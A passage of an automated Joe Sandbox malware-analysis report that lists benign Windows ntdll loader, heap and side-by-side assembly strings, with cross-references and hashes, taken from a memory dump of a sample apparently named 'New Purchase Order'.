                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011A2624
                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011A24C0
                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 011A261F
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                          • API String ID: 0-4009184096
                          • Opcode ID: 097a43af7b9e9d302defe2bdc0624ac8c27397f41aeef26f84185a68b5b96197
                          • Instruction ID: 17ed47733738c2902891e72837741efe767e5a9a747b3bf2a9459c5f6e1d9a7f
                          • Opcode Fuzzy Hash: 097a43af7b9e9d302defe2bdc0624ac8c27397f41aeef26f84185a68b5b96197
                          • Instruction Fuzzy Hash: AD0280B5D002299FDB39DB54CC80BE9BBB8AF54304F4141EAEA09A7241E7319F94CF59
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                          • API String ID: 0-2515994595
                          • Opcode ID: 3269b84564eefde410a371ed70fa4b344b391e6b265527a75f7e0d8c9d9b4a0a
                          • Instruction ID: da3bf3997cab9f924b7f2d378c4d5efa96f00cfb3ffb3346d269263c7df90e70
                          • Opcode Fuzzy Hash: 3269b84564eefde410a371ed70fa4b344b391e6b265527a75f7e0d8c9d9b4a0a
                          • Instruction Fuzzy Hash: A851AF715047519BD32EDF188944BABBBECEF94254F144A1EE999C3284E7B0E604C7A2
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                          • API String ID: 0-1700792311
                          • Opcode ID: 4036e3921e2f3643093cb84e42dc507469eba8f7c57771d6f898e5b4ada93011
                          • Instruction ID: d0c43c84e470e92b7ec3f57d998f1370da0ae544af06db2e102f84351e4e36e7
                          • Opcode Fuzzy Hash: 4036e3921e2f3643093cb84e42dc507469eba8f7c57771d6f898e5b4ada93011
                          • Instruction Fuzzy Hash: F5D1DC71A04A82EFDB2EDFA8D448AADBBF1FF49704F088049F4459B252D7B49981CF14
                          Strings
                          • VerifierDebug, xrefs: 011B8CA5
                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 011B8A67
                          • HandleTraces, xrefs: 011B8C8F
                          • AVRF: -*- final list of providers -*- , xrefs: 011B8B8F
                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 011B8A3D
                          • VerifierFlags, xrefs: 011B8C50
                          • VerifierDlls, xrefs: 011B8CBD
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                          • API String ID: 0-3223716464
                          • Opcode ID: 88907c6603154e42b9f15c9332fe3fe2d823e8eb3c54b16e91c97111fb1e89e7
                          • Instruction ID: fd1421261e275faa116049dbbbebf5427049e4f2480b8ad5ce476bc397e8bdae
                          • Opcode Fuzzy Hash: 88907c6603154e42b9f15c9332fe3fe2d823e8eb3c54b16e91c97111fb1e89e7
                          • Instruction Fuzzy Hash: 439133B2A45326BFD72EEF2898C0BEE77A8AB54F18F454559FA406B280C730DC01C795
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                          • API String ID: 0-1109411897
                          • Opcode ID: adcf7000d8f4da21e6a5424e459e747e314cc8f29216dcd4e275afc0a1086ddd
                          • Instruction ID: 71c0f66ca94aabbbbc4877c4db518339a95cf4757636f75f4969735932ea0152
                          • Opcode Fuzzy Hash: adcf7000d8f4da21e6a5424e459e747e314cc8f29216dcd4e275afc0a1086ddd
                          • Instruction Fuzzy Hash: C0A24774E0562A8BDF68CF18C9887ADBBB5AF85304F1442E9D91DA7254DB309E86CF01
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-792281065
                          Strings
                          • apphelp.dll, xrefs: 01126496
                          • minkernel\ntdll\ldrinit.c, xrefs: 01189A11, 01189A3A
                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011899ED
                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01189A01
                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01189A2A
                          • LdrpInitShimEngine, xrefs: 011899F4, 01189A07, 01189A30
                          Similarity
                          • API ID:
                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-204845295
                          Strings
                          • RtlGetAssemblyStorageRoot, xrefs: 011A2160, 011A219A, 011A21BA
                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011A2178
                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011A21BF
                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011A2180
                          • SXS: %s() passed the empty activation context, xrefs: 011A2165
                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011A219F
                          Similarity
                          • API ID:
                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                          • API String ID: 0-861424205
                          Strings
                          • minkernel\ntdll\ldrinit.c, xrefs: 0116C6C3
                          • Loading import redirection DLL: '%wZ', xrefs: 011A8170
                          • minkernel\ntdll\ldrredirect.c, xrefs: 011A8181, 011A81F5
                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 011A81E5
                          • LdrpInitializeProcess, xrefs: 0116C6C4
                          • LdrpInitializeImportRedirection, xrefs: 011A8177, 011A81EB
                          Similarity
                          • API ID:
                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                          • API String ID: 0-475462383
                          APIs
                            • Part of subcall function 01172DF0: LdrInitializeThunk.NTDLL ref: 01172DFA
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170BA3
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170BB6
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170D60
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170D74
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                          • String ID:
                          • API String ID: 1404860816-0
                          Strings
                          Similarity
                          • API ID:
                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                          • API String ID: 0-379654539
                          Strings
                          • @, xrefs: 01168591
                          • minkernel\ntdll\ldrinit.c, xrefs: 01168421
                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0116855E
                          • LdrpInitializeProcess, xrefs: 01168422
                          Similarity
                          • API ID:
                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-1918872054
                          Strings
                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011A21D9, 011A22B1
                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011A22B6
                          • .Local, xrefs: 011628D8
                          • SXS: %s() passed the empty activation context, xrefs: 011A21DE
                          Similarity
                          • API ID:
                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                          • API String ID: 0-1239276146
                          Strings
                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01191028
                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011910AE
                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01190FE5
                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0119106B
                          Similarity
                          • API ID:
                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                          • API String ID: 0-1468400865
                          Strings
                          • minkernel\ntdll\ldrinit.c, xrefs: 0119A9A2
                          • apphelp.dll, xrefs: 01152462
                          • LdrpDynamicShimModule, xrefs: 0119A998
                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0119A992
                          Similarity
                          • API ID:
                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-176724104
                          Strings
                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0114327D
                          • HEAP: , xrefs: 01143264
                          • HEAP[%wZ]: , xrefs: 01143255
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                          • API String ID: 0-617086771
                          Strings
                          Similarity
                          • API ID:
                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-4253913091
                          Strings
                          Similarity
                          • API ID:
                          • String ID: $@
                          • API String ID: 0-1077428164
                          Strings
                          Similarity
                          • API ID:
                          • String ID: FilterFullPath$UseFilter$\??\
                          • API String ID: 0-2779062949
                          Strings
                          • LdrpCheckModule, xrefs: 0119A117
                          • Failed to allocated memory for shimmed module list, xrefs: 0119A10F
                          • minkernel\ntdll\ldrinit.c, xrefs: 0119A121
                          Similarity
                          • API ID:
                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-161242083
                          Strings
                          Similarity
                          • API ID:
                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-1334570610
                          Strings
                          • LdrpInitializePerUserWindowsDirectory, xrefs: 011A82DE
                          • minkernel\ntdll\ldrinit.c, xrefs: 011A82E8
                          • Failed to reallocate the system dirs string !, xrefs: 011A82D7
                          Similarity
                          • API ID:
                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-1783798831
                          Strings
                          • @, xrefs: 011EC1F1
                          • PreferredUILanguages, xrefs: 011EC212
                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011EC1C5
                          Similarity
                          • API ID:
                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                          • API String ID: 0-2968386058
                          Strings
                          Similarity
                          • API ID:
                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                          • API String ID: 0-1373925480
                          Strings
                          • LdrpCheckRedirection, xrefs: 011B488F
                          • minkernel\ntdll\ldrredirect.c, xrefs: 011B4899
                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011B4888
                          Similarity
                          • API ID:
                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                          • API String ID: 0-3154609507
                          Strings
                          Similarity
                          • API ID:
                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-2558761708
                          Strings
                          • Process initialization failed with status 0x%08lx, xrefs: 011B20F3
                          • minkernel\ntdll\ldrinit.c, xrefs: 011B2104
                          • LdrpInitializationFailure, xrefs: 011B20FA
                          Similarity
                          • API ID:
                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-2986994758
                          APIs
                          Strings
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: #%u
                          • API String ID: 48624451-232158463
                          Strings
                          • LdrResSearchResource Enter, xrefs: 0113AA13
                          • LdrResSearchResource Exit, xrefs: 0113AA25
                          Similarity
                          • API ID:
                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                          • API String ID: 0-4066393604
                          Strings
                          Similarity
                          • API ID:
                          • String ID: `$`
                          • API String ID: 0-197956300
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Legacy$UEFI
                          • API String ID: 2994545307-634100481
                          • Opcode ID: d1c950874b454951e6ec6bb8fe9c724693e390521f54fddc8cae05e1ec576d3f
                          • Instruction ID: 8d3e24ba09e73e6af92b4db40526a2a91f55d1d1910439830db85e453d086be6
                          • Opcode Fuzzy Hash: d1c950874b454951e6ec6bb8fe9c724693e390521f54fddc8cae05e1ec576d3f
                          • Instruction Fuzzy Hash: 02615B76E016199FDB29DFA8C880BAEBFB9FB44704F54402DE649EB291D731A900CB50
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$MUI
                          • API String ID: 0-17815947
                          • Opcode ID: 12e63691bf1fe698d201c7e4d79d08ea8453e51f2d58e6b44686c05166b006d1
                          • Instruction ID: d54d0ba3163e14d8b0a358c60edcc053606dd38cac56c96d68b275f9ca981efc
                          • Opcode Fuzzy Hash: 12e63691bf1fe698d201c7e4d79d08ea8453e51f2d58e6b44686c05166b006d1
                          • Instruction Fuzzy Hash: 89510971E0021DAFDF15DFA9CC90AEEBBB9EB44758F10052AE611B7690D7309E45CB60
                          Strings
                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0113063D
                          • kLsE, xrefs: 01130540
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                          • API String ID: 0-2547482624
                          • Opcode ID: 96848103577d993661ce756101a4d1b879eeab83b68fb83c0878a07838a06edb
                          • Instruction ID: 1a17f2f730ec865e8d087a5edb14892ced374dcf523ba635eafdc652f67cef20
                          • Opcode Fuzzy Hash: 96848103577d993661ce756101a4d1b879eeab83b68fb83c0878a07838a06edb
                          • Instruction Fuzzy Hash: 8F51BEB15047429FD729EF28C4446A7BBE4AFC8304F10483EFAEA87289E774D545CB92
                          Strings
                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0113A2FB
                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0113A309
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                          • API String ID: 0-2876891731
                          • Opcode ID: af4f3d2e0bc2312a696a1b28b1526282dba5e2285fbe53d21c08b8832101f129
                          • Instruction ID: e15e1f47de19d0b2397e5ca22e48ca02ab85b805cb9429766cdf0176cfcc921a
                          • Opcode Fuzzy Hash: af4f3d2e0bc2312a696a1b28b1526282dba5e2285fbe53d21c08b8832101f129
                          • Instruction Fuzzy Hash: F6411F30A08255DBEB2DCF58D880BAE7BF4FF80704F1440A9E951DB2A5E3B4D900CB41
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Cleanup Group$Threadpool!
                          • API String ID: 2994545307-4008356553
                          • Opcode ID: bb64fbf15e0e9610e44bd51166ce73b7cf1ded06422e81f6c7281aa1755ca723
                          • Instruction ID: 16c7df5dc7838af063adc0746d3743e4e95e0bc9b85e58a4cf6ddc8c3cc51378
                          • Opcode Fuzzy Hash: bb64fbf15e0e9610e44bd51166ce73b7cf1ded06422e81f6c7281aa1755ca723
                          • Instruction Fuzzy Hash: 0A014FB2200700AFD326CF24ED09F2A77E8EB80B29F008839F608C7580E374E810CB46
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: MUI
                          • API String ID: 0-1339004836
                          • Opcode ID: 75b356abc7b4544a36d24fd610cc16b02e7a71d5b4f8980cb97c7b5133d631d3
                          • Instruction ID: e6635745057a7f283a7a08a6bda2804f7cf840aa19db8f0d037825d0fb480871
                          • Opcode Fuzzy Hash: 75b356abc7b4544a36d24fd610cc16b02e7a71d5b4f8980cb97c7b5133d631d3
                          • Instruction Fuzzy Hash: 21827C75E002188BEF2CCFA9C8807EDBBB5BF88750F14816AD919BB259D7309D45CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 12861bd4b4a4c0c8bbea07ff4e63dcfca1897a2a86ce3a447edba36708f24d97
                          • Instruction ID: bc1c6e0e24803123a68d8e19c52466e11f89bfd9de0f5b9173621ba9e0c13d58
                          • Opcode Fuzzy Hash: 12861bd4b4a4c0c8bbea07ff4e63dcfca1897a2a86ce3a447edba36708f24d97
                          • Instruction Fuzzy Hash: BF917372900619AFEB29DF95CC85FEEBBB8EF18B54F100065F610AB191D774AD00CBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 2c6bcb04b8ffc995e575cf7d17c274af42be422b25db7b8a69be7fe7c541f966
                          • Instruction ID: a3eb0082cb41dcce5744860b3490c331f3d071850702ed4ec73e340667cc4efb
                          • Opcode Fuzzy Hash: 2c6bcb04b8ffc995e575cf7d17c274af42be422b25db7b8a69be7fe7c541f966
                          • Instruction Fuzzy Hash: 3B91AF31A02609BFDB2AAFA5DC84FEFBB79EF85744F100029F511AB250DB759901CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: GlobalTags
                          • API String ID: 0-1106856819
                          • Opcode ID: 6a93e9bf31c30d2bcfc345a9c433d47060bc4cb384525ad87cfd0780cfe3e4bb
                          • Instruction ID: 70a7f55d65d2c546980273b4faaa56a6f32c0f287bfdf93340ec2164d0026e99
                          • Opcode Fuzzy Hash: 6a93e9bf31c30d2bcfc345a9c433d47060bc4cb384525ad87cfd0780cfe3e4bb
                          • Instruction Fuzzy Hash: 49717BB9E0031ADFDF2CCF98D590AADBFB2BF48704F58812AE905A7245E7318941CB50
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: .mui
                          • API String ID: 0-1199573805
                          • Opcode ID: e954275c007ecb6ac1907a8246be0133013562a0d914fe978948f18434ff77e2
                          • Instruction ID: d0792f9142425e427d2eef8d3d92495cf556900c579a034a45fed4aa71b745db
                          • Opcode Fuzzy Hash: e954275c007ecb6ac1907a8246be0133013562a0d914fe978948f18434ff77e2
                          • Instruction Fuzzy Hash: 1351C472D0022A9BDF1DDF99D840AAEBBB4BF14A44F054129E912BBA54D7349C01CFE5
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: EXT-
                          • API String ID: 0-1948896318
                          • Opcode ID: b4d7e4cc02a9700a6dffd5e1471167560a0d5f4f96eb2607c5ce498a6888d9bb
                          • Instruction ID: c0fd957dabdd7387d4366d0f02047f7e0b0978524c7653a8dee3e915b3d94851
                          • Opcode Fuzzy Hash: b4d7e4cc02a9700a6dffd5e1471167560a0d5f4f96eb2607c5ce498a6888d9bb
                          • Instruction Fuzzy Hash: 7341A1715097129BD719DB75C880B6BB7E8BF88B29F040D2DF684D7180E778D9048797
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: BinaryHash
                          • API String ID: 0-2202222882
                          • Opcode ID: d0795d97f51807a6caa3f40f2d1094b0dfac2241e74ef530bb8aa3ff926c4620
                          • Instruction ID: b05321d4f73dd320ab02c79a0003eb805f8453b7b5e48fe732e28f5ee8c1c602
                          • Opcode Fuzzy Hash: d0795d97f51807a6caa3f40f2d1094b0dfac2241e74ef530bb8aa3ff926c4620
                          • Instruction Fuzzy Hash: F14144B5D0012DAADB25DA60CC84FDEBB7CAB54718F4045E5E608AB240DB709E498FD4
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: #
                          • API String ID: 0-1885708031
                          • Opcode ID: 27f5b7ede9471433f15cfd873cc02a39971a8eaf740866bdb73a76218311fddb
                          • Instruction ID: 22a7c60aecf059253cd82c1e9f68994f9969f2a2e9979da8e5cd0efbb335714b
                          • Opcode Fuzzy Hash: 27f5b7ede9471433f15cfd873cc02a39971a8eaf740866bdb73a76218311fddb
                          • Instruction Fuzzy Hash: B1313931A007199BEB3ADF69C850BEE7BB8DF25B04F14402CE951AB382C775D905CB54
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: BinaryName
                          • API String ID: 0-215506332
                          • Opcode ID: 38774543ec4a3b8bc01609cd90ea65fb3d60f21c22c48886b8786cde0bcb6520
                          • Instruction ID: 3611cdd8d8adc6ae1756e34b1b75b6ecf62195e3107c054690d69c74b1dd8bdd
                          • Opcode Fuzzy Hash: 38774543ec4a3b8bc01609cd90ea65fb3d60f21c22c48886b8786cde0bcb6520
                          • Instruction Fuzzy Hash: DD31037A900519AFEB1DDB58C851FBFFF74EB807A0F414129A911A7250D7319E00DBE0
                          Strings
                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 011B895E
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                          • API String ID: 0-702105204
                          • Opcode ID: 8bd4a29cdedea4234fa111c5b066252fad5da756755b82d52e511b0e1d54d83c
                          • Instruction ID: 981074719c41b36e14ab71ac3799285133faf93b175cdda72a5db0722e8f842a
                          • Opcode Fuzzy Hash: 8bd4a29cdedea4234fa111c5b066252fad5da756755b82d52e511b0e1d54d83c
                          • Instruction Fuzzy Hash: BF014732210226ABEF3C6E1598C8BEABB69EFC2E58B04012CF64106055DB20AC81C792
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ede6441f5c8fdb065c82d21f8e58380edb78ff6a73b1cf15b3114b4ed12432ac
                          • Instruction ID: fe63354deeb141e93ec25a6f51339615a6c3f1ac5bb7d0159d47e6d906d9105b
